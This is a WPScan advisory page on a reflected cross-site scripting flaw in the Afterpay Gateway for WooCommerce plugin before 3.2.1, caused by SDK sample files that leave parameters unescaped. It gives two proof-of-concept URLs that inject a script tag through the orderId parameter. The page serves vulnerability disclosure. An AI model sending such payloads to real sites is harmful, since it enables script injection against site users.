Afterpay Gateway for WooCommerce < 3.2.1 – Reflected Cross-Site Scripting | Plugin Vulnerabilities

Description

The plugin has sample files form the https://github.com/afterpay/sdk-php library, which do not escape some parameters before outputting them in attributes, leading to Reflected Cross-Site Scripting issues.

Proof of Concept

https://example.com/wp-content/plugins/afterpay-gateway-for-woocommerce/vendor/afterpay-global/afterpay-sdk-php/sample/HTTPRequestDeferredPaymentCapture.php?orderId="><script>alert(/XSS/)</script>

https://example.com/wp-content/plugins/afterpay-gateway-for-woocommerce/vendor/afterpay-global/afterpay-sdk-php/sample/HTTPRequestDeferredPaymentVoid.php?orderId="><script>alert(/XSS/)</script>

Affects Plugins

afterpay-gateway-for-woocommerce

Fixed in 3.2.1

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

de756284-642b-4b1a-a2a5-c36864569765

Timeline

Publicly Published

2021-08-16 (about 4 years ago)

Added

2021-08-16 (about 4 years ago)

Last Updated

2021-08-16 (about 4 years ago)

Other

Published

Title

Published

2021-12-07

Title

10Web Social Photo Feed < 1.4.29 - Reflected Cross-Site Scripting (XSS)

Published

2025-03-11

Title

Event post < 5.9.9 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-05-31

Title

Master Slider - Responsive Touch Slider < 3.9.10 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-03-28

Title

The Plus Blocks for Block Editor | Gutenberg < 3.2.6 - Reflected Cross-Site Scripting

Published

2025-10-21

Title

WP-Force Images Download < 1.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode